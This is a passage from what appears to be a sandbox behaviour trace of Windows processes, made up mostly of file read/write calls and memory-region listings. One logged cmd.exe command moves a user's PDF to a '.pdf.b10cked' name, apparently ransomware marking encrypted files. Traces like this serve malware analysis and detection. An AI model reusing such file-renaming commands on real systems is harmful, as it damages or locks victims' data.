| out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] GetFileType (hFile=0x4c) returned 0x1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] GetFileType (hFile=0x4c) returned 0x1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] GetFileType (hFile=0x4c) returned 0x1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] GetFileType (hFile=0x4c) returned 0x1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] GetFileType (hFile=0x4c) returned 0x1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] GetFileType (hFile=0x4c) returned 0x1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.943] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.943] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.943] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.943] ReadFile 
(in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] GetFileType (hFile=0x4c) returned 0x1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] GetFileType (hFile=0x4c) returned 0x1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] GetFileType (hFile=0x4c) returned 0x1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] GetFileType (hFile=0x4c) returned 0x1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] GetFileType (hFile=0x4c) returned 0x1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] GetFileType (hFile=0x4c) returned 0x1 [0140.944] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] GetFileType (hFile=0x4c) returned 0x1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] GetFileType (hFile=0x4c) returned 0x1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.944] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.944] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.944] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.944] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] GetFileType (hFile=0x4c) returned 0x1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] GetFileType (hFile=0x4c) returned 0x1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, 
lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] GetFileType (hFile=0x4c) returned 0x1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] GetFileType (hFile=0x4c) returned 0x1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] GetFileType (hFile=0x4c) returned 0x1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] GetFileType (hFile=0x4c) returned 0x1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] GetFileType (hFile=0x4c) returned 0x1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, 
lpOverlapped=0x0) returned 1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] GetFileType (hFile=0x4c) returned 0x1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.945] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.945] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] GetFileType (hFile=0x4c) returned 0x1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] GetFileType (hFile=0x4c) returned 0x1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] GetFileType (hFile=0x4c) returned 0x1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] GetFileType (hFile=0x4c) returned 0x1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] WriteFile (in: hFile=0x4c, 
lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] GetFileType (hFile=0x4c) returned 0x1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] GetFileType (hFile=0x4c) returned 0x1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] GetFileType (hFile=0x4c) returned 0x1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] GetFileType (hFile=0x4c) returned 0x1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.946] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.946] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0140.946] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x32, lpOverlapped=0x0) returned 1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] GetFileType (hFile=0x4c) returned 0x1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] GetFileType (hFile=0x4c) returned 0x1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x32, lpOverlapped=0x0) returned 1 [0140.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.947] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.947] _close (_FileHandle=4) returned 0 [0140.947] FindNextFileW (in: hFindFile=0x480e78, lpFindFileData=0x2ef42c | out: lpFindFileData=0x2ef42c) returned 0 [0140.947] GetLastError () returned 0x12 [0140.947] FindClose (in: hFindFile=0x480e78 | out: hFindFile=0x480e78) returned 1 [0140.947] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0140.948] _close (_FileHandle=3) returned 0 [0140.948] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.948] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.948] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.948] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.948] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.948] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.949] SetConsoleInputExeNameW () returned 0x1 [0140.949] GetConsoleOutputCP () returned 0x1b5 [0140.949] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 
[0140.949] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.949] exit (_Code=0) Process: id = "169" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c00" os_pid = "0xf54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14852 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14853 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14854 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14855 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 14856 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14857 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename 
= "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14858 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14859 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14860 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 14861 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15450 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15451 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15452 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15453 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 15454 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 15455 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15456 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 
"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15457 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15458 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15459 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15460 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15461 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15462 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15463 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15464 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 15465 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 
15466 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15467 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 15468 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 15469 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 15470 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 15471 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 15472 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 15473 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 226 os_tid = 0xf44 [0139.983] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16faf4 | out: lpSystemTimeAsFileTime=0x16faf4*(dwLowDateTime=0x8d5e4820, dwHighDateTime=0x1d440a9)) [0139.983] GetCurrentProcessId () returned 0xf54 [0139.983] GetCurrentThreadId () returned 0xf44 [0139.983] GetTickCount () returned 0x2bfb5 [0139.983] QueryPerformanceCounter (in: lpPerformanceCount=0x16faec | out: lpPerformanceCount=0x16faec*=19677231072) returned 1 [0139.984] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0139.984] __set_app_type (_Type=0x1) [0139.984] __p__fmode () returned 0x76b331f4 [0139.984] __p__commode () returned 0x76b331fc [0139.984] SetUnhandledExceptionFilter 
(lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0139.984] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0139.984] GetCurrentThreadId () returned 0xf44 [0139.984] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf44) returned 0x38 [0139.984] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.984] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0139.984] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.984] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0139.984] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fa84 | out: phkResult=0x16fa84*=0x0) returned 0x2 [0139.985] VirtualQuery (in: lpAddress=0x16fabb, lpBuffer=0x16fa54, dwLength=0x1c | out: lpBuffer=0x16fa54*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.985] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fa54, dwLength=0x1c | out: lpBuffer=0x16fa54*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0139.985] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fa54, dwLength=0x1c | out: lpBuffer=0x16fa54*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0139.985] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fa54, dwLength=0x1c | out: lpBuffer=0x16fa54*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.985] VirtualQuery (in: 
lpAddress=0x170000, lpBuffer=0x16fa54, dwLength=0x1c | out: lpBuffer=0x16fa54*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0139.985] GetConsoleOutputCP () returned 0x1b5 [0139.985] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.985] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0139.985] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.985] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0139.985] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.985] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0139.985] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.985] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0139.985] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.985] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 